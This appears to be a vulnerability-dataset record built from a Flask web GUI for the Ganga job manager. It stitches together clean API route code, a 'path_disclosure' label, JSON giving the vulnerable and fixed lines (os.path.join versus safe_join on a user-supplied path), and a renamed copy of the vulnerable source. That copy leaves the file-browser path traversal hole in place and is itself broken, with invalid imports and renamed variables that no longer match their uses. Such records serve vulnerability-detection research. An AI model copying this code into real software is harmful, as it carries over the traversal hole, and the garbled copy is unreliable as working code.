def job_copy_endpoint(current_api_user, job_id: int):
"""
Create a copy of the job.
:param current_api_user: Information of the current_api_user based on the request's JWT token
:param job_id: int
"""
try:
# Query ganga to copy the job
response_info = query_internal_api(f"/internal/jobs/{job_id}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Job action API - PUT Method
@gui.route("/api/jobs/<int:job_id>/<action>", methods=["PUT"])
@token_required
def job_action_endpoint(current_api_user, job_id: int, action: str):
"""
Given the job_id and action in the endpoint, perform the action on the job.
The action can be any method or attribute change that can be called on the Job object.
Example:
1)
PUT http://localhost:5000/job/13/resubmit
The above request will resubmit the job with ID 13.
2)
PUT http://localhost:5000/job/13/force_status
{"force_status":"failed"}
The above request will force status of the job with ID 13 to killed. If unsuccessful will return back the error.
3)
PUT http://localhost:5000/job/13/name
{"name"="New Name"}
The above request will change the name of the job with ID 13 to "New Name". Notice how the required values
are passed in the request body with the same name as action.
NOTE: It is NECESSARY to send body in JSON format for the request to be parsed in JSON.
:param job_id: int
:param action: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Request data
request_data = request.json
try:
# Query ganga to perform the action
response_info = query_internal_api(f"/internal/jobs/{job_id}/{action}", "put", json=request_data)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Job delete API - DELETE Method
@gui.route("/api/jobs/<int:job_id>", methods=["DELETE"])
@token_required
def job_delete_endpoint(current_api_user, job_id: int):
"""
Given the job id, removes the job from the job repository.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to delete the job
response_info = query_internal_api(f"/internal/jobs/{job_id}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# Pin the Job
@gui.route("/api/jobs/<int:job_id>/pin", methods=["PUT"])
@token_required
def job_pin_endpoint(current_api_user, job_id: int):
"""
Pin the given job, which is then shown in the dashboard.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Get current user
u = current_user
# Load pinned jobs of the user from the database
pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
# Pin job
if job_id not in pinned_jobs:
pinned_jobs.append(job_id)
# Add new pinned jobs to the database
u.pinned_jobs = json.dumps(pinned_jobs)
db.session.add(u)
db.session.commit()
return jsonify({"success": True, "message": f"Successfully pinned Job (ID={job_id})."})
# Unpin the job
@gui.route("/api/jobs/<int:job_id>/unpin", methods=["PUT"])
@token_required
def job_unpin_endpoint(current_api_user, job_id: int):
"""
Unpin the job, and make the required change to the GUI database.
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
# Get the user from the database
u = current_user
# Load user's pinned job from the database
pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
# Unpin the job
if job_id in pinned_jobs:
pinned_jobs.remove(job_id)
# Commit changes to the database
u.pinned_jobs = json.dumps(pinned_jobs)
db.session.add(u)
db.session.commit()
return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={job_id})."})
# ******************** Subjobs API ******************** #
# Subjobs API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs", methods=["GET"])
@token_required
def subjobs_endpoint(current_api_user, job_id: int):
"""
Returns a list subjobs of a particular job in a similar way as Jobs API.
The parameter accepted are:
* ids: provide a JSON string of list of IDs
* status: provide subjob status as a string for filter
* application: provide subjob application as a string for filter
* backend: provide backend application as a string for filter
* recent: if provided, starts a list from recent subjobs to old
* length: number of subjobs to be returned, provide as a int
* offset: how many subjobs to skip before returning the specified length of subjobs. Provide as int.
offset works as: number of subjobs skipped = offset * length
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
params = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset")
}
try:
# Query ganga for subjobs information
subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(subjobs_info)
# Single subjob info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@token_required
def subjob_endpoint(current_api_user, job_id: int, subjob_id: int):
"""
Returns information of a single subjob related to a particular job
:param job_id: int
:param subjob_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query subjob information to ganga
subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(subjob_info)
# Single Subjob Attribute Info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/<attribute>", methods=["GET"])
@token_required
def subjob_attribute_endpoint(current_api_user, job_id: int, subjob_id: int, attribute: str):
"""
Given the job id, subjob id and attribute; return the attribute information in the string format via JSON.
:param job_id: int
:param subjob_id: int
:param attribute: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query attribute information from ganga
subjob_attribute_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/{attribute}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(subjob_attribute_info)
# Single subjob full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/full-print", methods=["GET"])
@token_required
def subjob_full_print_endpoint(current_api_user, job_id: int, subjob_id: int):
"""
Return full print of the subjob.
:param subjob_id: int
:param job_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query subjob full print from ganga
full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(full_print_info)
# Copy subjob API - PUT Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/copy", methods=["PUT"])
@token_required
def subjob_copy_endpoint(current_api_user, job_id: int, subjob_id: int):
"""
Create a copy of the subjob into a new job.
:param job_id:
:param subjob_id:
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to copy subjob
response_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/copy", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# ******************** Jobs API ******************** #
# Jobs API - GET Method
@gui.route("/api/jobs", methods=["GET"])
@token_required
def jobs_endpoint(current_api_user):
"""
Returns a list of jobs with general information in JSON format.
The parameter accepted are:
* ids: provide a JSON string of list of IDs
* status: provide job status as a string for filter
* application: provide job application as a string for filter
* backend: provide backend application as a string for filter
* recent: if provided, starts a list from recent job to old
* length: number of job to be returned, provide as a int
* offset: how many job to skip before returning the specified length of job. Provide as int.
offset works like: number of job skipped = offset * length
* auto-validate-ids: If ids provided in ids parameters does not exist in job repository, then skip those ids.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
params = {
"ids": request.args.get("ids"),
"status": request.args.get("status"),
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
"auto-validate-ids": request.args.get("auto-validate-ids")
}
try:
# Get jobs information according to select filter and range filter
jobs_info = query_internal_api(f"/internal/jobs", "get", params=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(jobs_info)
# Jobs statistics API - GET Method
@gui.route("/api/jobs/statistics", methods=["GET"])
@token_required
def jobs_statistics_endpoint(current_api_user):
"""
Returns the number of jobs in new, running, completed, killed, failed status.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get statistics information
statistics = query_internal_api("/internal/jobs/statistics", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(statistics)
@gui.route("/api/queue", methods=["GET"])
@token_required
def queue_endpoint(current_api_user):
try:
queue_info = query_internal_api("/internal/queue", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(queue_info)
@gui.route("/api/queue/chart", methods=["GET","POST"])
def queue_chart_endpoint():
chart_info = query_internal_api("/internal/queue/data", "get")
response = make_response(json.dumps(chart_info))
response.content_type = 'application/json'
return response
# Job incomplete ids API - GET Method
@gui.route("/api/jobs/incomplete_ids", methods=["GET"])
@token_required
def jobs_incomplete_ids_endpoint(current_api_user):
"""
Returns a list of incomplete job ids in JSON format.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get incomplete ids list
incomplete_ids_list = query_internal_api("/internal/jobs/incomplete-ids", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(incomplete_ids_list)
# ******************** Config API ******************** #
# Config API - GET Method
@gui.route("/api/config", methods=["GET"], defaults={"section": ""})
@gui.route("/api/config/<section>", methods=["GET"])
@token_required
def config_endpoint(current_api_user, section: str):
"""
Returns a list of all the section of the configuration and their options as well as the values in JSON format.
If section is provide, returns information about the section in JSON format.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get config information
if section != "":
config_info = query_internal_api(f"/internal/config/{section}", "get")
else:
config_info = query_internal_api("/internal/config", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(config_info)
# ******************** Templates API ******************** #
# Templates API - GET Method
@gui.route("/api/templates", methods=["GET"])
@token_required
def templates_endpoint(current_api_user):
"""
Returns a list of objects containing template info in JSON format.
* ids: provide a JSON string of list of IDs
* status: provide template status as a string for filter
* application: provide template application as a string for filter
* backend: provide backend application as a string for filter
* recent: if provided, starts a list from recent template to old
* length: number of template to be returned, provide as a int
* offset: how many template to skip before returning the specified length of template. Provide as int.
offset works like: number of template skipped = offset * length
:param current_api_user: Information of the current_user based on the request's JWT token
"""
params = {
"application": request.args.get("application"),
"backend": request.args.get("backend"),
"recent": request.args.get("recent"),
"length": request.args.get("length"),
"offset": request.args.get("offset"),
}
try:
# Query ganga for templates information
templates_info = query_internal_api("/internal/templates", "get", params=params)
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(templates_info)
# Single template full print API - GET Method
@gui.route("/api/templates/<int:template_id>/full-print", methods=["GET"])
@token_required
def template_full_print_endpoint(current_api_user, template_id: int):
"""
Return full print of the template.
:param template_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query template full print from ganga
full_print_info = query_internal_api(f"/internal/templates/{template_id}/full-print", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(full_print_info)
# Template API - DELETE Method
@gui.route("/api/templates/<int:template_id>", methods=["DELETE"])
@token_required
def delete_template_endpoint(current_api_user, template_id: int):
"""
Given the templates id, delete it from the template repository.
:param template_id: int
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to remove the template
response_info = query_internal_api(f"/internal/templates/{template_id}", "delete")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# ******************** Credentials API ******************** #
# Credential store API - GET Method
@gui.route("/api/credentials", methods=["GET"])
@token_required
def credentials_endpoint(current_api_user):
"""
Return a list of credentials and their information in JSON format.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga for credentials information
credentials_info = query_internal_api("/internal/credentials", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(credentials_info)
# Credential Store API - PUT Method - Renew all credentials
@gui.route("/api/credentials/renew", methods=["PUT"])
@token_required
def credentials_renew_endpoint(current_api_user):
"""
Renew all the credentials in the credential store.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to renew credentials
response_info = query_internal_api("/internal/credentials/renew", "put")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(response_info)
# ******************** Job Tree API ******************** #
# Job tree API - GET Method
@gui.route("/api/jobtree", methods=["GET"])
@token_required
def jobtree_endpoint(current_api_user):
"""
Return the job tree folder structure as the json format of python dict.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get job tree information
jobtree_info = query_internal_api("/internal/jobtree", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(jobtree_info)
# ******************** Job Tree API ******************** #
# Plugins API - GET Method
@gui.route("/api/plugins", methods=["GET"])
@token_required
def plugins_endpoint(current_api_user):
"""
Return plugins information, category and names of the plugins in the category.
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get plugins information
plugins_info = query_internal_api("/internal/plugins", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(plugins_info)
# Plugin API - GET Method
@gui.route("/api/plugins/<plugin_name>", methods=["GET"])
@token_required
def plugin_endpoint(current_api_user, plugin_name: str):
"""
Return single plugin information like name and docstring.
:param plugin_name: str
:param current_api_user: Information of the current_api_user based on the request's JWT token
"""
try:
# Query ganga to get plugin information
plugin_info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return jsonify(plugin_info)
# ******************** Helper Functions ******************** #
# Validate uploaded filename.
def allowed_file(filename):
return "." in filename and filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS
# Make HTTP request to the Internal Flask Server which is running on a GangaThread which has access to ganga namespace.
def query_internal_api(route: str, method: str, **kwargs):
"""
:param route: str
:param method: str
:param kwargs: dict
:return: dict
Make a HTTP request to the Internal API Flask server which runs on a GangaThread to query data from Ganga.
Check response status code and extract the data or raise an exception accordingly.
kwargs can be param, json, etc. Any attribute that is supported by the requests module.
"""
# Internal url for communicating with API server running on a GangaThread
INTERNAL_URL = f"http://localhost:{gui.config['INTERNAL_PORT']}"
# Raise error if HTTP method not supported
if method not in ["get", "post", "put", "delete"]:
raise Exception(f"Unsupported method: {method}")
# Made the HTTP requests, along with whatever arguments provided
res = getattr(requests, method)(INTERNAL_URL + route, **kwargs)
# Check is request is OK
if res.status_code != 200:
raise Exception(res.json().get("message"))
# Return request data
return res.json()
def create_session_defaults():
"""
Create user session defaults and assign default values to them.
"""
# Set session defaults for templates filter
if "templates_per_page" not in session:
session["templates_per_page"] = 10
if "templates_filter" not in session:
session["templates_filter"] = {key: "any" for key in ["application", "backend"]}
# Set session defaults for jobs filter
if "jobs_per_page" not in session:
session["jobs_per_page"] = 10
if "jobs_filter" not in session:
session["jobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
# Set session defaults for subjobs filter
if "subjobs_per_page" not in session:
session["subjobs_per_page"] = 10
if "subjobs_filter" not in session:
session["subjobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
# Ping internal API server
def ping_internal():
"""
Ping internal API server if it is running
"""
trials = 0
while True:
try:
ping = query_internal_api("/ping", "get")
if ping is True:
return True
except:
time.sleep(2)
print("Internal API server not online (mostly because Ganga is booting up), retrying...")
trials += 1
if trials > 20:
return False
def start_ganga(internal_port: int, args: str = ""):
"""
Start a ganga session in a pseudo terminal and stores the file descriptor of the terminal as well as the PID of the ganga session.
:param args: str - str of arguments to provide to ganga
:param internal_port: int
"""
# Create child process attached to a pty that we can read from and write to
(child_pid, fd) = pty.fork()
if child_pid == 0:
# This is the child process fork. Anything printed here will show up in the pty, including the output of this subprocess
ganga_env = os.environ.copy()
ganga_env["WEB_CLI"] = "True"
ganga_env["INTERNAL_PORT"] = str(internal_port)
subprocess.run(f"ganga --webgui {args}", shell=True, env=ganga_env)
else:
# This is the parent process fork. Store fd (connected to the child’s controlling terminal) and child pid
gui.config["FD"] = fd
gui.config["CHILD_PID"] = child_pid
set_windowsize(fd, 50, 50)
print("Ganga started, PID: ", child_pid)
# Set the window size of the pseudo terminal according to the size in the frontend
def set_windowsize(fd, row, col, xpix=0, ypix=0):
winsize = struct.pack("HHHH", row, col, xpix, ypix)
fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize)
# Read and forward that data from the pseudo terminal to the frontend
def read_and_forward_pty_output():
max_read_bytes = 1024 * 20
while True:
socketio.sleep(0.01)
if gui.config["FD"]:
timeout_sec = 0
(data_ready, _, _) = select.select([gui.config["FD"]], [], [], timeout_sec)
if data_ready:
output = os.read(gui.config["FD"], max_read_bytes).decode()
socketio.emit("pty-output", {"output": output}, namespace="/pty")
def start_web_cli(host: str, port: int, internal_port: int, log_output=True, ganga_args: str = ""):
"""
Start the web server on eventlet serving the terminal on the specified port. (Production ready server)
:param ganga_args: str - arguments to be passed to ganga
:param host: str
:param port: int
:param internal_port: int
"""
from GangaGUI.start import create_default_user
# Create default user
gui_user, gui_password = create_default_user()
print(f"Starting the GUI server on http://{host}:{port}")
print(f"You login information for the GUI is: Username: {gui_user.user} Password: {gui_password}")
gui.config["INTERNAL_PORT"] = internal_port
gui.config["WEB_CLI"] = True
gui.config["GANGA_ARGS"] = ganga_args
socketio.run(gui, host=host, port=port, log_output=log_output) # TODO
# ******************** Shutdown Function ******************** #
# Route used to shutdown the Internal API server and GUI server
@gui.route("/shutdown", methods=["GET"])
def shutdown():
if gui.config["WEB_CLI"] is True:
flash("WEB CLI Mode is on, cannot self shutdown server. Consider doing manually.", "warning")
return redirect(url_for("dashboard"))
try:
response_info = query_internal_api("/shutdown", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return "GUI Shutdown Successful."
# ******************** EOF ******************** #
| path_disclosure | {
"code": [
"from werkzeug.utils import secure_filename",
" abs_path = os.path.join(job_base_dir, path)"
],
"line_no": [
15,
659
]
} | {
"code": [
"from werkzeug.utils import secure_filename, safe_join",
" abs_path = safe_join(job_base_dir, path)"
],
"line_no": [
15,
659
]
} | import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import .fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, VAR_84, send_file, make_response
from flask_login import .login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
VAR_0 = Flask(__name__)
VAR_0.config.from_object(Config)
VAR_1 = SQLAlchemy(VAR_0)
VAR_2 = LoginManager(VAR_0)
VAR_2.login_view = "login"
VAR_2.login_message = "Please Login to Access this Page."
VAR_2.login_message_category = "warning"
VAR_3 = SocketIO(VAR_0)
class CLASS_0(UserMixin, VAR_1.Model):
__tablename__ = "users"
VAR_35 = VAR_1.Column(VAR_1.Integer, primary_key=True)
VAR_36 = VAR_1.Column(VAR_1.String(64), unique=True)
VAR_37 = VAR_1.Column(VAR_1.String(32), unique=True)
VAR_38 = VAR_1.Column(VAR_1.String(64))
VAR_39 = VAR_1.Column(VAR_1.String(32))
VAR_40 = VAR_1.Column(VAR_1.Text)
def FUNC_66(self, VAR_41: str):
self.password_hash = generate_password_hash(VAR_41)
def FUNC_67(self, VAR_41: str) -> bool:
return check_password_hash(self.password_hash, VAR_41)
def FUNC_68(self, VAR_42: int = 5) -> str:
return jwt.encode(
{"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=VAR_42)},
VAR_0.config["SECRET_KEY"], algorithm="HS256")
def __repr__(self):
return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
@VAR_2.user_loader
def FUNC_0(VAR_4):
return CLASS_0.query.get(int(VAR_4))
VAR_5 = {
"new": "info",
"completed": "success",
"completed_frozen" : "success",
"failed": "danger",
"failed_frozen" : "danger",
"running": "primary",
"submitted": "secondary",
"killed": "warning"
}
VAR_6 = {"txt", "py"}
actions = {}
VAR_8 = {}
@VAR_0.before_first_request
def FUNC_1():
global VAR_7, VAR_8
if VAR_0.config['WEB_CLI'] is True:
FUNC_61(VAR_0.config['INTERNAL_PORT'], VAR_25=VAR_0.config["GANGA_ARGS"])
VAR_84["WEB_CLI"] = True
elif VAR_0.config['INTERNAL_PORT'] is None:
VAR_0.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
if current_user.is_authenticated:
logout_user()
FUNC_59()
if not FUNC_60():
print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
sys.exit(1)
try:
VAR_7 = FUNC_58("/internal/jobs/actions", "get")
VAR_8 = FUNC_58("/internal/plugins", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
@VAR_0.route("/login", methods=["GET", "POST"])
def VAR_2():
if current_user.is_authenticated:
return redirect(url_for("dashboard"))
if request.method == "POST":
VAR_85 = request.form.get("username")
VAR_41 = request.form.get("password")
VAR_37 = CLASS_0.query.filter_by(VAR_37=VAR_85).first()
if VAR_37 and VAR_37.verify_password(VAR_41):
login_user(VAR_37, True)
flash("Login successful", "success")
return redirect(url_for("dashboard"))
flash("Error identifying the user", "danger")
VAR_43 = CLASS_0.query.all()
return render_template("login.html", title="Login", VAR_43=users)
@VAR_0.route("/logout", methods=["GET"])
def FUNC_3():
if current_user.is_authenticated:
logout_user()
return redirect(url_for("login"))
@VAR_0.route("/")
@login_required
def FUNC_4():
VAR_44 = {}
VAR_45 = []
VAR_46 = []
try:
VAR_44 = FUNC_58("/internal/jobs/statistics", "get")
VAR_45 = FUNC_58("/internal/jobs/recent", "get")
VAR_72 = current_user
VAR_46 = FUNC_58("/internal/jobs", "get", VAR_73={
"ids": VAR_72.pinned_jobs if VAR_72.pinned_jobs is not None else json.dumps([]),
"auto-validate-ids": True})
except Exception as err:
flash(str(err), "danger")
return render_template("dashboard.html",
title="Dashboard",
VAR_44=quick_statistics,
VAR_45=recent_jobs_info,
VAR_46=pinned_jobs_info,
VAR_5=status_color)
@VAR_0.route("/config", methods=["GET", "POST"])
@login_required
def FUNC_5():
VAR_47 = []
VAR_48 = []
VAR_18 = None
if request.method == "POST":
VAR_18 = request.form.get("section")
VAR_18 = None if VAR_18 in ["", None] else VAR_18
try:
VAR_47 = FUNC_58("/internal/config", "get")
VAR_48 = VAR_47 if VAR_18 is None else [s for s in VAR_47 if s["name"] == VAR_18]
except Exception as err:
flash(str(err), "danger")
return render_template("config.html", title="Config", VAR_47=full_config_info, VAR_48=config_info)
@VAR_0.route("/config_edit",methods=["GET", "POST"])
@login_required
def FUNC_6():
VAR_49 = VAR_0.config["GANGA_RC"]
with open(VAR_49, "rt") as VAR_14:
VAR_86 = VAR_14.read()
if request.method == 'POST':
VAR_87 = request.form['config-data']
with open(VAR_49, 'w') as f1:
f1.write(str(VAR_87))
flash(".gangarc Edited", "success")
with open(VAR_49, "rt") as f2:
VAR_86 = f2.read()
return render_template("config_edit.html", title="Edit gangarc", VAR_86=ganga_config)
@login_required
@VAR_0.route("/create", methods=["GET", "POST"])
def FUNC_7():
if request.method == "POST":
if "loadfile" in request.files:
VAR_119 = request.files["loadfile"]
if VAR_119.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_119 and FUNC_57(VAR_119.filename):
VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
VAR_119.save(VAR_130)
try:
VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_130})
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
flash(VAR_98.get("message"), "success")
return redirect(request.url)
if "runfile" in request.files:
VAR_120 = request.files["runfile"]
if VAR_120.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
if VAR_120 and FUNC_57(VAR_120.filename):
VAR_130 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
VAR_120.save(VAR_130)
try:
VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_130})
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
flash(VAR_98.get("message"), "success")
return redirect(request.url)
flash("No file, retry!", "warning")
return redirect(request.url)
try:
VAR_88 = FUNC_58("/internal/templates", "get",
VAR_73={"recent": True, "length": "6"})
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("create.html", title="Create", VAR_88=templates_info)
@VAR_0.route("/create/runfile", methods=["GET", "POST"])
@login_required
def FUNC_8():
VAR_50 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "runfile.py")
if request.method == "POST":
VAR_89 = request.form.get("runfile-data")
with open(VAR_50, "w+") as VAR_14:
f.write(VAR_89)
try:
VAR_98 = FUNC_58("/internal/runfile", "get", VAR_73={"path": VAR_50})
flash(VAR_98["message"], "success")
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
return render_template("runfile.html", title="Runfile")
@VAR_0.route("/templates", methods=["GET", "POST"])
@login_required
def FUNC_9():
if request.method == "POST":
session["templates_per_page"] = int(request.form.get("templates-per-page"))
VAR_84["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["application", "backend"], ["template-application", "template-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_52 = VAR_84["templates_per_page"]
try:
VAR_90 = FUNC_58("/internal/templates/length", "get", VAR_73=VAR_84["templates_filter"])
VAR_91 = (int(VAR_90) // int(VAR_52)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("templates_page", page=VAR_91 - 1))
params = VAR_84["templates_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_52,
"offset": VAR_51
})
VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("create_page"))
return render_template("templates.html",
title="Templates",
VAR_91=number_of_pages,
VAR_51=current_page,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_88=templates_info)
@VAR_0.route("/jobs", methods=["GET", "POST"])
@login_required
def FUNC_10():
if request.method == "POST":
session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
VAR_84["jobs_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["status", "application", "backend"],
["job-status", "job-application", "job-backend"])}
VAR_51 = int(request.args.get("page")) if request.args.get("page") is not None else 0
VAR_53 = VAR_84["jobs_per_page"]
try:
VAR_92 = FUNC_58("/internal/jobs/length", "get", VAR_73=VAR_84["jobs_filter"])
VAR_91 = (int(VAR_92) // int(VAR_53)) + 1
if VAR_51 >= VAR_91:
return redirect(url_for("jobs_page", page=VAR_91 - 1))
params = VAR_84["jobs_filter"].copy()
VAR_73.update({
"recent": True,
"length": VAR_53,
"offset": VAR_51
})
VAR_93 = FUNC_58("/internal/jobs", "get", VAR_73=params)
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("jobs.html",
title="Jobs",
VAR_93=jobs_info,
backends=VAR_8["backends"],
applications=VAR_8["applications"],
VAR_91=number_of_pages,
VAR_51=current_page,
VAR_5=status_color)
@VAR_0.route('/jobs/<int:VAR_9>')
@login_required
def FUNC_11(VAR_9: int):
VAR_54 = None
VAR_55 = None
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
VAR_96 = os.path.join(VAR_94["outputdir"], "stdout")
VAR_97 = os.path.join(VAR_94["outputdir"], "stderr")
if os.path.exists(VAR_96):
with open(VAR_96) as VAR_14:
VAR_54 = VAR_14.read()
if os.path.exists(VAR_97):
with open(VAR_97) as VAR_14:
VAR_55 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("jobs_page"))
return render_template("job.html",
title=f"Job {VAR_9}",
VAR_94=job_info,
VAR_5=status_color,
attribute_actions=VAR_7.get("attributes"),
method_actions=VAR_7.get("methods"),
VAR_54=stdout,
VAR_55=stderr,
VAR_95=full_print_info)
@VAR_0.route("/jobs/<int:VAR_9>/export")
@login_required
def FUNC_12(VAR_9: int):
VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], f"export.txt")
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
return send_file(VAR_56, as_attachment=True, cache_timeout=0, attachment_filename=f"Job_{VAR_9}.txt")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
@VAR_0.route("/jobs/<int:VAR_9>/edit", methods=["GET", "POST"])
@login_required
def FUNC_13(VAR_9: int):
VAR_57 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "loadfile.txt")
VAR_56 = os.path.join(VAR_0.config["UPLOAD_FOLDER"], "export.txt")
if request.method == "POST":
VAR_99 = request.form.get("edited-job-info")
with open(VAR_57, "w+") as VAR_14:
f.write(VAR_99)
try:
VAR_98 = FUNC_58("/internal/load", "get", VAR_73={"path": VAR_57})
flash(VAR_98["message"], "success")
except Exception as err:
flash(str(err), "danger")
return redirect(request.url)
try:
VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/export", "get", VAR_73={"path": VAR_56})
with open(VAR_56) as VAR_14:
VAR_121 = VAR_14.read()
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
return render_template("edit_job.html", title=f"Edit Job {VAR_9}", VAR_9=job_id, VAR_121=exported_data)
@VAR_0.route("/job/<int:VAR_9>/browse", defaults={"path": ""})
@VAR_0.route("/job/<int:VAR_9>/browse/<VAR_10:path>")
@login_required
def FUNC_14(VAR_9: int, VAR_10):
try:
VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
VAR_100 = os.path.dirname(os.path.dirname(VAR_94["outputdir"]))
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("job_page", VAR_9=job_id))
VAR_58 = os.path.join(VAR_100, VAR_10)
VAR_59 = os.path.dirname(VAR_58).replace(VAR_100, "")
if not os.path.exists(VAR_58):
flash("Directory for this job does not exist.", "warning")
